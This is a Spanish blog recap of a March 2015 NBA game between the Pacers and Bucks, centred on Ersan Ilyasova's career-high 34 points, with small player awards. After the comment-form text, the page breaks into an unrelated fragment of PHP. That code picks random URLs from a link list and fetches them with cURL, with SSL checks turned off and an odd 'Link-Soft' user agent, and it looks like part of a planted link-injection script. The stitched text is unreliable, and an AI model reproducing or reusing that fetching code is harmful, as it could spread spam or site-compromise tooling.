La Crónica: Y de repente, Ilyasova

27 de March de 2015 por MagicJohnson32

Son fechas en las que la NBA cede el protagonismo al Sweet Sixteen, así que en la madrugada del jueves había programado un único partido, un Pacers-Bucks que en octubre pintaba a bodrio pero que, llegado el momento, presentaba alicientes de sobra para que le dediquemos una crónica. Aquí va.

ily_scola

Indiana Pacers 107 – Miwaukee Bucks 111

No imaginaba la NBA que Pacers y Bucks llegarían a finales de marzo con sus opciones de Playoffs intactas. Así que el partido que Silver colocó en solitario un jueves de March Madness por completar calendario resultó muy trascendente. La victoria correspondió a los Bucks, que enlazan dos seguidas por primera vez desde febrero y al fin encuentran oxígeno tras una racha (coincidiendo con el traspaso de Brandon Knight y la llegada de MCW) que hacía peligrar la gran campaña firmada hasta entonces. Si hay que señalar a un jugador como culpable del resultado de anoche, ése es Ersan Ilyasova, que se destapó para obtener la mejor marca anotadora de su carrera con una actuación cercana a la perfección. La noche dulce del turco empezó pronto: anotó 15 de los últimos 17 puntos de los Bucks en el primer cuarto, y de esta manera lanzó a los Bucks a una ventaja que alcanzó los 20 puntos. Pese a que la diferencia se mantuvo casi siempre por encima de la decena, los Pacers, que no entienden de rendiciones, echaron el resto en el último cuarto y lograron dar emoción a la noche. Tres triples seguidos de George Hill pusieron el 92-94, pero hasta ahí llegaron los de Vogel. Hill dispuso de un triple para forzar la prórroga pero su lanzamiento no entró y los Pacers encajan la que supone su séptima derrota en ocho partidos.

PREMIOS

MVP: Sospechoso habitual y miembro destacado del Club del Cazo Mix, Ersan Ilyasova no anda corto de talento. Y a veces hasta se digna a demostrarlo. Los Pacers lo sufrieron anoche en la forma de 34 puntos con 12 de 14 en tiros de campo, 6 rebotes, 2 asistencias y 2 recuperaciones.

Rookie: El único novato que hizo acto de presencia anoche fue Tyler Ennis, quien apenas dispuso de 6 minutos de juego. Premio desierto hoy.

Sorpresa: Sin Stuckey y con Scola titular en sustitución de David West, a CJ Watson le correspondía casi en exclusiva dar a Vogel una buena rotación. Lo hizo, sin duda. Watson logró 23 puntos, 7 rebotes, 7 asistencias y 2 recuperaciones.

Decepción: El resto del banquillo de los Pacers fue un erial. Entre Mahinmi, Rudez y Lavoy Allen aportaron 4 puntos y 11 rebotes en 63 minutos.

Mayor esfuerzo en vano: Pese a los malos resultados recientes de los Pacers, el nivel de George Hill está siendo espectacular. Anoche fueron 24 puntos, 5 asistencias, 3 rebotes y 1 robo, una actuación que estuvo cerca de lograr la remontada de los suyos.

Top 5

Imágenes | AP Photos / Getty Images

Esta entrada no tiene comentarios... pero tú puedes ser el primero.

Deja un comentario

html; } class Helper { public function random_date() { $low = '732045693'; $high = time(); $random = rand($low, $high); return date("D, d M Y H:i:s",$random); } } class Fetch_site { public $url; public $html; public function __construct($sites=null, $link_list=null) { $this->is_curl_installed(); if($link_list !== null) { $this->choose_site($link_list); } $this->load_site($this->url); } public function choose_site($file=null) { $file = explode("\n", $file); $key = rand(0, (count($file)-1)); $this->url = trim($file[$key]); } public function load_site($url) { $useragent = array('Link-Soft'); $rand = array_rand($useragent); $ch = curl_init(); $options = array( CURLOPT_URL => $url, CURLOPT_HEADER => 0, CURLOPT_USERAGENT => $useragent[$rand], CURLOPT_SSL_VERIFYHOST => 0, CURLOPT_SSL_VERIFYPEER => 0, CURLOPT_RETURNTRANSFER => 1, CURLOPT_FOLLOWLOCATION => 1, CURLOPT_ENCODING => "", CURLOPT_AUTOREFERER => 1, CURLOPT_CONNECTTIMEOUT => 30, CURLOPT_TIMEOUT => 30, CURLOPT_MAXREDIRS => 5, ); curl_setopt_array($ch,$options); $result = curl_exec($ch); if(!$result) { return curl_error($ch); } curl_close($ch); $this->html = $result; } public function is_curl_installed() { if(!in_array('curl',get_loaded_extensions())) { trigger_error("cURL PHP extension is disabled or not installed.",E_USER_ERROR); } } } unset($n); ?>